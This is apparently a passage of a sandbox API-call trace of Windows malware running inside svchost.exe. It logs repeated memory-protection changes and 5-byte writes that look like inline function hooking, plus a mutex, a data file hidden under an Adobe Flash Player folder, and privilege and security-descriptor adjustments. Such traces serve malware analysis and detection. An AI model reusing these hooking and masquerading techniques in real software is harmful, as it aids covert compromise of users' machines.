RegionSize=0x15a000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.919] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416ff30, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.920] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416ff30, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.921] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff005b, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.921] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416ff30, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.921] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416ff30, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.921] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74144320, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x74144000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x185000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.922] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74144320, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.922] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74144320, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.922] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0065, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.922] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74144320, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.922] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74144320, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.923] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74172410, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x74172000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x157000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.923] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74172410, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.923] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74172410, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.923] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff006f, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.923] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74172410, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.924] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74172410, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.924] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74250b80, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x74250000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x79000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.924] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74250b80, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.924] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74250b80, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.925] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0079, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.925] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74250b80, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.926] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74250b80, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.926] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x741b9fd0, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x741b9000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x110000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.926] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741b9fd0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.926] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741b9fd0, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.927] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0083, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.927] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741b9fd0, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.928] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741b9fd0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.928] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7416acb0, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7416a000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x15f000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.928] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416acb0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.928] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416acb0, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.928] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff008d, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.928] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416acb0, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.929] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416acb0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.929] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7418b730, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7418b000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x13e000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.929] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b730, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.929] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b730, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.929] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff0097, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.929] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b730, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.930] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b730, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.930] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7418b650, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7418b000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x13e000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.930] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b650, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.930] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b650, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.930] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff00a1, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.931] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b650, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.932] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b650, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.932] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7414cb20, lpBuffer=0x4f5f570, dwLength=0x1c | out: lpBuffer=0x4f5f570*(BaseAddress=0x7414c000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x17d000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0059.932] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7414cb20, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x20) returned 1 [0059.932] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7414cb20, lpBuffer=0x4f5f5a0, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesRead=0x0) returned 1 [0059.932] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4ff00ab, lpBuffer=0x4f5f5a0*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.932] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7414cb20, lpBuffer=0x4f5f5a0*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x4f5f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.933] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7414cb20, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x4f5f59c | out: lpflOldProtect=0x4f5f59c*=0x40) returned 1 [0059.933] ConvertSidToStringSidW () returned 0x1 [0059.933] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0059.933] GetLastError () returned 0x0 [0059.933] GetLocalTime (in: lpSystemTime=0x4f5f5d0 | out: lpSystemTime=0x4f5f5d0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x16, wMilliseconds=0x163)) [0059.934] GetCurrentThreadId () returned 0x7e4 [0059.934] GetCurrentProcessId () returned 0x2ec [0059.934] wvnsprintfW (in: pszDest=0x5401268, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x4f5f574 | out: pszDest="[13.10.2016 15:42:22] ver=2.2.5, log=0x0003, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: ") returned 86 [0059.934] wvnsprintfW (in: pszDest=0x5401314, cchDest=1962, pszFmt="Initialized successfully:\r\nVersion: %u.%u.%u\r\nIntegrity level: %u\r\ncoreData.proccessFlags: 0x%08X\r\nFull path: %s\r\nCommand line: %s\r\nSID: %s\r\nbaseConfig hash=0x%08X\r\ncoreData.modules.current=0x%p\r\ncoreData.initFlags=0x%x", arglist=0x4f5f5f0 | out: pszDest="Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000105\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x04EB0000\r\ncoreData.initFlags=0x3") returned 340 [0059.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0003, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000105\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x04EB0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 426 [0059.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0003, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000105\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x04EB0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x5402278, cbMultiByte=427, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0003, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000105\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x04EB0000\r\ncoreData.initFlags=0x3", lpUsedDefaultChar=0x0) returned 426 [0059.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0003, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000105\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x04EB0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 426 [0059.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0003, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000105\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x04EB0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x54024e0, cbMultiByte=427, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:22] ver=2.2.5, log=0x0003, PID=0x02EC, TID=0x07E4, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000105\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x04EB0000\r\ncoreData.initFlags=0x3", lpUsedDefaultChar=0x0) returned 426 [0059.935] GetSystemTime (in: lpSystemTime=0x4f5f1c0 | out: lpSystemTime=0x4f5f1c0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x16, wMilliseconds=0x163)) [0059.936] SystemTimeToFileTime (in: lpSystemTime=0x4f5f1c0, lpFileTime=0x4f5f1b0 | out: lpFileTime=0x4f5f1b0) returned 1 [0059.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0059.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5402470, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0059.937] GetModuleHandleA (lpModuleName="secur32.dll") returned 0x0 [0059.937] LoadLibraryA (lpLibFileName="secur32.dll") returned 0x74350000 [0059.987] LoadLibraryA (lpLibFileName="SSPICLI") returned 0x744e0000 [0059.988] GetProcAddress (hModule=0x744e0000, lpProcName="GetUserNameExW") returned 0x744ec5f0 [0059.988] GetUserNameExW () returned 0x1 [0059.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0059.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5402590, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="8A") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="00") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="00") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="00") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="B7") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="49") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="67") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="98") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="F6") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="14") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="59") returned 2 [0059.991] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="35") returned 2 [0059.992] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="AA") returned 2 [0059.992] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="3E") returned 2 [0059.992] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="27") returned 2 [0059.992] wvnsprintfW (in: pszDest=0x4f5efa8, cchDest=6, pszFmt="%02X", arglist=0x4f5ef84 | out: pszDest="60") returned 2 [0059.992] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x154 [0059.992] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0059.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4f5f05c, cbMultiByte=92, lpWideCharStr=0x4f5ee20, cchWideChar=150 | out: lpWideCharStr="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoeӵ豞皰") returned 92 [0059.993] PathCombineW (in: pszDest=0x4ed12e8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" [0059.993] PathRemoveFileSpecW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0059.994] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0059.994] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0059.994] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0059.994] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0059.995] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0059.995] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0059.995] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0059.996] GetCurrentThread () returned 0xfffffffe [0059.996] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x4f5f20c | out: TokenHandle=0x4f5f20c*=0x0) returned 0 [0059.996] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x4f5f20c | out: TokenHandle=0x4f5f20c*=0x158) returned 1 [0059.996] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x4f5f214 | out: lpLuid=0x4f5f214*(LowPart=0x8, HighPart=0)) returned 1 [0059.998] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x4f5f210*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0059.998] GetLastError () returned 0x0 [0059.998] CloseHandle (hObject=0x158) returned 1 [0059.998] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0059.998] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214310, lpbSaclPresent=0x4f5f244, pSacl=0x4f5f238, lpbSaclDefaulted=0x4f5f240 | out: lpbSaclPresent=0x4f5f244, pSacl=0x4f5f238, lpbSaclDefaulted=0x4f5f240) returned 1 [0059.998] SetNamedSecurityInfoW () returned 0x0 [0060.081] LocalFree (hMem=0x5214310) returned 0x0 [0060.081] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0060.081] GetCurrentThread () returned 0xfffffffe [0060.081] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x4f5f20c | out: TokenHandle=0x4f5f20c*=0x0) returned 0 [0060.081] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x4f5f20c | out: 